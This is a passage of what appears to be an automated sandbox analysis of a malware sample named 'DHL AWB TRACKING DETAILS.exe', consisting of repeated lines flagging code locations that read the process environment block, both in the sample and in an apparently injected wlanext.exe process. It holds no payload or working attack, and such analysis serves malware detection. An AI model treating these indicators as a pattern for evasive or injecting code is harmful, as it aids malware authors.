          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AB8DF1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]1_2_00A86DC9
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]1_2_00A0AD30
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]1_2_00A13D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]1_2_00ACE539
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]1_2_00A34D3B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]1_2_00AD8D34
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]1_2_00A8A537
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]1_2_00A2C577
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]1_2_00A43D43
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]1_2_00A83540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]1_2_00A27D50
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AD0EA5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]1_2_00A846A7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]1_2_00A9FE87
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]1_2_00A316E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]1_2_00A176E2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]1_2_00A48EC7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ABFEC0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]1_2_00A336CC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AD8ED6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]1_2_00A0E620
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]1_2_00ABFE3F
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]1_2_00A38E00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]1_2_00AC1608
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]1_2_00A1766D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]1_2_00A18794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]1_2_00A437F5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]1_2_00A3E730
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]1_2_00A2F716
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]1_2_00A1FF60
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]1_2_00AD8F6A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]1_2_00A1EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335E730 mov eax, dword ptr fs:[00000030h]11_2_0335E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334F716 mov eax, dword ptr fs:[00000030h]11_2_0334F716
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E131B mov eax, dword ptr fs:[00000030h]11_2_033E131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A70E mov eax, dword ptr fs:[00000030h]11_2_0335A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A70E mov eax, dword ptr fs:[00000030h]11_2_0335A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03353B7A mov eax, dword ptr fs:[00000030h]11_2_03353B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03353B7A mov eax, dword ptr fs:[00000030h]11_2_03353B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332DB60 mov ecx, dword ptr fs:[00000030h]11_2_0332DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333FF60 mov eax, dword ptr fs:[00000030h]11_2_0333FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8F6A mov eax, dword ptr fs:[00000030h]11_2_033F8F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8B58 mov eax, dword ptr fs:[00000030h]11_2_033F8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332F358 mov eax, dword ptr fs:[00000030h]11_2_0332F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332DB40 mov eax, dword ptr fs:[00000030h]11_2_0332DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333EF40 mov eax, dword ptr fs:[00000030h]11_2_0333EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F5BA5 mov eax, dword ptr fs:[00000030h]11_2_033F5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352397 mov eax, dword ptr fs:[00000030h]11_2_03352397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335B390 mov eax, dword ptr fs:[00000030h]11_2_0335B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03338794 mov eax, dword ptr fs:[00000030h]11_2_03338794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E138A mov eax, dword ptr fs:[00000030h]11_2_033E138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DD380 mov ecx, dword ptr fs:[00000030h]11_2_033DD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033637F5 mov eax, dword ptr fs:[00000030h]11_2_033637F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334DBE9 mov eax, dword ptr fs:[00000030h]11_2_0334DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A53CA mov eax, dword ptr fs:[00000030h]11_2_033A53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A53CA mov eax, dword ptr fs:[00000030h]11_2_033A53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DFE3F mov eax, dword ptr fs:[00000030h]11_2_033DFE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332E620 mov eax, dword ptr fs:[00000030h]11_2_0332E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03364A2C mov eax, dword ptr fs:[00000030h]11_2_03364A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03364A2C mov eax, dword ptr fs:[00000030h]11_2_03364A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov ecx, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AA16 mov eax, dword ptr fs:[00000030h]11_2_0332AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AA16 mov eax, dword ptr fs:[00000030h]11_2_0332AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03343A1C mov eax, dword ptr fs:[00000030h]11_2_03343A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A61C mov eax, dword ptr fs:[00000030h]11_2_0335A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A61C mov eax, dword ptr fs:[00000030h]11_2_0335A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03358E00 mov eax, dword ptr fs:[00000030h]11_2_03358E00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1608 mov eax, dword ptr fs:[00000030h]11_2_033E1608
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03338A0A mov eax, dword ptr fs:[00000030h]11_2_03338A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336927A mov eax, dword ptr fs:[00000030h]11_2_0336927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8A62 mov eax, dword ptr fs:[00000030h]11_2_033F8A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333766D mov eax, dword ptr fs:[00000030h]11_2_0333766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EEA55 mov eax, dword ptr fs:[00000030h]11_2_033EEA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033B4257 mov eax, dword ptr fs:[00000030h]11_2_033B4257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EAE44 mov eax, dword ptr fs:[00000030h]11_2_033EAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EAE44 mov eax, dword ptr fs:[00000030h]11_2_033EAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333AAB0 mov eax, dword ptr fs:[00000030h]11_2_0333AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333AAB0 mov eax, dword ptr fs:[00000030h]11_2_0333AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335FAB0 mov eax, dword ptr fs:[00000030h]11_2_0335FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A46A7 mov eax, dword ptr fs:[00000030h]11_2_033A46A7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFE87 mov eax, dword ptr fs:[00000030h]11_2_033BFE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033376E2 mov eax, dword ptr fs:[00000030h]11_2_033376E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352AE4 mov eax, dword ptr fs:[00000030h]11_2_03352AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033516E0 mov ecx, dword ptr fs:[00000030h]11_2_033516E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8ED6 mov eax, dword ptr fs:[00000030h]11_2_033F8ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03368EC7 mov eax, dword ptr fs:[00000030h]11_2_03368EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033536CC mov eax, dword ptr fs:[00000030h]11_2_033536CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DFEC0 mov eax, dword ptr fs:[00000030h]11_2_033DFEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352ACB mov eax, dword ptr fs:[00000030h]11_2_03352ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AD30 mov eax, dword ptr fs:[00000030h]11_2_0332AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
